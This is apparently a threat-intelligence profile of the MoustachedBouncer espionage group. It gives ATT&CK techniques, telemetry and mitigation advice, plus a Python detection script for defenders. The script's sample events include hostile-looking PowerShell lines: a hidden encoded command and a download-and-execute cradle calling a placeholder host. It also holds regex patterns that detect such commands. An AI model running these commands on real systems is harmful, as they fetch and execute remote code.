G1019: MoustachedBouncer
MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.[1]
Analyst context for executives and security teams
MoustachedBouncer matters because ATT&CK identifies it as a long-running cyberespionage group targeting foreign embassies in Belarus, with related custom Windows implants and techniques spanning initial access, execution, stealth, collection, command and control, and privilege escalation. For leaders, the decision value is not broad exposure by default; it is whether diplomatic, government-facing, Belarus-related, or similarly sensitive operations have the visibility and response readiness to detect targeted content injection, script execution, packed tooling, data staging, and covert network routing.
Executive priority
Treat this as a targeted-espionage readiness question rather than a generic malware alert. Executives should ask whether high-sensitivity users and locations have defensible endpoint, network, and incident-response coverage; whether vulnerability management can reduce privilege-escalation paths; and whether audit evidence exists for PowerShell/script controls, egress monitoring, and investigation of suspected data collection. Priority is highest for organizations with diplomatic, governmental, regional, or sensitive-policy exposure connected to Belarus or comparable threat models.
Technical view
ATT&CK provides no official detection text for the group, so SOC and IR teams should validate coverage through the related behaviors and software: Disco, SharpDisco, and NightClub are the associated custom implants and dropper, all with Windows as the related software platform. Detection engineering should focus on suspicious PowerShell and JavaScript execution, packed or obfuscated executables, C#/.NET dropper or plugin-loading patterns, abnormal screenshot collection, privilege-escalation exploit indicators, remote data staging, proxy-like command-and-control paths, and signs of content injection in network traffic. Because the group object itself has no platforms or tactics listed, scope detection logic from the linked software and techniques rather than assuming enterprise-wide platform applicability.
Likely telemetry
- Endpoint process creation and command-line telemetry, especially for PowerShell, Windows Script Host/JScript, and unusual child-process chains
- Script block, module, and PowerShell operational logs where available
- Endpoint file creation, module load, and executable metadata useful for identifying packed, obfuscated, C#/.NET, or C++ implant-like artifacts
- EDR or operating-system telemetry for screen capture behavior and suspicious API or utility use
- Vulnerability and patch-state records to assess privilege-escalation exposure
Detection direction
- Build coverage around the linked techniques rather than the group name alone; group-level ATT&CK detection guidance is not provided.
- Tune PowerShell and JavaScript detections for suspicious execution context, encoded or obfuscated content, unusual parent processes, and post-compromise automation while accounting for legitimate administration.
- Validate controls against packed or obfuscated executables using behavior and memory/runtime indicators, not only static signatures.
- Hunt for plugin-loading or modular implant patterns associated with droppers and implants, especially on Windows systems given the related software platform data.
- Correlate suspected content injection with endpoint execution and network path evidence; blind spots often exist where organizations lack full proxy, TLS inspection metadata, or upstream network visibility.
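As an added illustration of the detection direction above (this is example code written for this page, not Glexia or MITRE tooling), the block below runs three behavior rules over a handful of constructed endpoint events in a simplified Sysmon-like shape: suspicious PowerShell execution (encoded or hidden-window invocation, download cradles, unusual parent processes), Windows Script Host running JavaScript spawned by a browser, and file writes to an `AActdata` directory on a UNC share, the staging path named in the technique table. Field names, the parent-process baseline and the sample events are assumptions for the example; tune the parent set and regexes to your environment's legitimate administration patterns.

```python
import re

# Constructed sample telemetry (not from the page or any real incident):
# simplified, Sysmon-like endpoint events. Field names are an assumption.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"type": "process", "parent": "chrome.exe", "image": "wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\u\\Downloads\\setup.js"},
    {"type": "process", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')\""},
    {"type": "file", "image": "update.exe",
     "path": "\\\\fileserver01\\share\\AActdata\\20230810-screen.png"},
    {"type": "file", "image": "explorer.exe",
     "path": "C:\\Users\\u\\Documents\\report.docx"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
WSH_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}
# Parents that rarely launch PowerShell legitimately: script hosts, mshta,
# browsers and Office applications. Assumed baseline; tune per environment.
SUSPICIOUS_PARENTS = WSH_HOSTS | BROWSERS | {"mshta.exe", "winword.exe",
                                             "excel.exe", "outlook.exe"}

ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+\S")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
CRADLE_RE = re.compile(r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile)\b")
JS_ARG_RE = re.compile(r"(?i)\S+\.jse?\b")
# Staging directory named on the page (.\AActdata\) written to an SMB share.
STAGING_RE = re.compile(r"(?i)^\\\\[^\\]+\\.*\\AActdata\\")


def check_powershell(ev):
    """T1059.001: PowerShell with encoded/hidden/download-cradle content or an
    unusual parent. Returns a list of reason strings (empty means no hit)."""
    if ev.get("image", "").lower() not in SCRIPT_HOSTS:
        return []
    cmd = ev.get("cmdline", "")
    reasons = []
    if ENCODED_RE.search(cmd):
        reasons.append("encoded command")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if CRADLE_RE.search(cmd):
        reasons.append("download/IEX cradle")
    if ev.get("parent", "").lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"unusual parent {ev['parent']}")
    return reasons


def check_javascript(ev):
    """T1059.007: Windows Script Host executing a .js/.jse file, with an extra
    reason when a browser spawned it (delivery through an HTML page)."""
    if ev.get("image", "").lower() not in WSH_HOSTS:
        return []
    reasons = []
    if JS_ARG_RE.search(ev.get("cmdline", "")):
        reasons.append("WSH executing JavaScript file")
    if ev.get("parent", "").lower() in BROWSERS:
        reasons.append(f"spawned by browser {ev['parent']}")
    return reasons


def check_staging(ev):
    """T1074.002: file written into an AActdata directory on a UNC share."""
    if ev.get("type") == "file" and STAGING_RE.search(ev.get("path", "")):
        return ["screenshot staging path on SMB share"]
    return []


def analyze(events):
    """Run every rule over every event and return one finding per hit."""
    rules = (("T1059.001", check_powershell),
             ("T1059.007", check_javascript),
             ("T1074.002", check_staging))
    findings = []
    for ev in events:
        for technique, rule in rules:
            reasons = rule(ev)
            if reasons:
                findings.append({"technique": technique,
                                 "image": ev.get("image"),
                                 "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["technique"], f["image"], "; ".join(f["reasons"]))
```

Each rule returns its reasons separately so an analyst can see why an event fired and weight the finding (an encoded command from a script-host parent is far stronger than a lone hidden-window flag). The benign inventory script and the local document write are included to show the rules stay quiet on ordinary administration.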
Mitigation priorities
- Start with asset and exposure scoping: identify sensitive users, diplomatic/government-facing operations, Belarus-related business context, and high-value Windows endpoints.
- Ensure endpoint and network logging is retained long enough to support espionage investigations, including script execution, file activity, and egress telemetry.
- Harden PowerShell and script execution through least privilege, administrative control, logging, and approved-use baselines.
- Prioritize vulnerability remediation for systems where privilege escalation would materially increase access to sensitive data or operations.
- Use application control, attachment/content handling controls, and malware prevention to reduce execution of unknown packed or custom tooling.
Analyst notes and limits
The most actionable ATT&CK context comes from the relationships: MoustachedBouncer uses Disco, SharpDisco, NightClub, and techniques including Software Packing, PowerShell, JavaScript, Exploitation for Privilege Escalation, Remote Data Staging, Proxy, Screen Capture, Content Injection, and a mobile-domain naming/location evasion technique. The official description cites activity since at least 2014 targeting foreign embassies in Belarus. Use this profile to guide threat-informed validation for organizations with relevant geopolitical or sensitive-information exposure.
The supplied group object has no official detection text, no listed platforms, and no group-level tactics. Platform and behavior inferences should therefore be limited to the provided relationships, especially the Windows association for related software and the platforms listed on related techniques. Local environment telemetry, business exposure, and threat intelligence are required before determining material risk or detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.001 | PowerShell (sub-technique) | MoustachedBouncer has used plugins to execute PowerShell scripts.[1] |
| Enterprise | T1059.007 | JavaScript (sub-technique) | MoustachedBouncer has used JavaScript to deliver malware hosted on HTML pages.[1] |
| Enterprise | T1027.002 | Software Packing (sub-technique) | MoustachedBouncer has used malware plugins packed with Themida.[1] |
| Enterprise | T1113 | Screen Capture | MoustachedBouncer has used plugins to take screenshots on targeted systems.[1] |
| Enterprise | T1090 | Proxy | MoustachedBouncer has used a reverse proxy tool similar to the GitHub repository revsocks.[1] |
| Enterprise | T1068 | Exploitation for Privilege Escalation | MoustachedBouncer has exploited CVE-2021-1732 to execute malware components with elevated rights.[1] |
| Enterprise | T1074.002 | Remote Data Staging (sub-technique) | MoustachedBouncer has used plugins to save captured screenshots to `.\AActdata\` on an SMB share.[1] |
| Enterprise | T1659 | Content Injection | MoustachedBouncer has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware.[1] |
Groups, software, and campaigns
S1090: NightClub
NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.[1]
S1088: Disco
Disco is a custom implant that has been used by MoustachedBouncer since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.[1]
S1089: SharpDisco
SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 89fccc64214a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] MoustachedBouncer ESET August 2023: Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 25, 2023.
- [2] mitre-attack G1019
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.